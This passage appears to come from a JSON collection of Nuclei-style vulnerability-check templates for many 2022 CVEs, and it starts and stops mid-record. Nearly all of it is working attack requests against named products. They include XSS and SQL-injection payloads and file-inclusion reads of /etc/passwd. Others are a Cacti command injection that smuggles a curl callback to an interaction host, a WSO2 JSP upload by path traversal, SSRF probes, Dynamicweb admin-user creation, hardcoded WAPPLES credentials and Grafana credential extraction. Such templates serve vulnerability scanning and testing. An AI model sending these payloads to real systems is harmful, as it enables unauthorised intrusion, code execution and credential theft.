Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-26148","info":{"name":"Grafana & Zabbix Integration - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redirect=%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zabbix\":","\"zbx\":","alexanderzobnin-zabbix-datasource"],"condition":"or"},{"type":"regex","part":"body","regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"password\":\"(.*?)\"","\"username\":\"(.*?)\"","\"url\":\"([a-z:/0-9.]+)\\/api_jsonrpc\\.php"]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42094","info":{"name":"Backdrop CMS version 1.23.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/card HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"form_id\"\n\ncard_node_form\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-13\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"date[time]\"\n\n21:49:36\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"comment\"\n\n1\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryWEcZgRB4detkrGaY\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryWEcZgRB4detkrGaY--\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-1386","info":{"name":"WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\naction=fusion_form_update_view\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268\nOrigin: {{BaseURL}}\nReferer: {{RootURL}}\n\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"formData\"\n\nemail=example%40example.com&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva\ncy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"action\"\n\nfusion_form_submit_form_to_url\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusion_form_nonce\"\n\n{{fusionformnonce}}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"form_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"post_id\"\n\n0\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"field_labels\"\n\n{\"email\":\"Email address\"}\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"hidden_field_names\"\n\n[]\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionAction\"\n\nhttps://oast.me\n-----------------------------30259827232283860776499538268\nContent-Disposition: form-data; name=\"fusionActionMethod\"\n\nGET\n-----------------------------30259827232283860776499538268--\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Interactsh Server"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"fusionformnonce","internal":true,"xpath":["//*[@id=\"fusion-form-nonce-0\"]"],"attribute":"value","part":"body_1"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46169","info":{"name":"Cacti <=1.2.22 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /remote_agent.php?action=polldata&local_data_ids[0]=1&host_id=1&poller_id=;curl%20{{interactsh-url}}%20-H%20'User-Agent%3a%20{{useragent}}'; HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: 127.0.0.1\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"value\":","\"local_data_id\":"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-4063","info":{"name":"WordPress InPost Gallery <2.1.4.1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-48165","info":{"name":"Wavlink - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportLogs.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Password=","Login="],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password=([^\\s]+)"]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31847","info":{"name":"WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37299","info":{"name":"Shirne CMS 1.2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["cm9vd"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-31984","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33891","info":{"name":"Apache Spark UI - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; 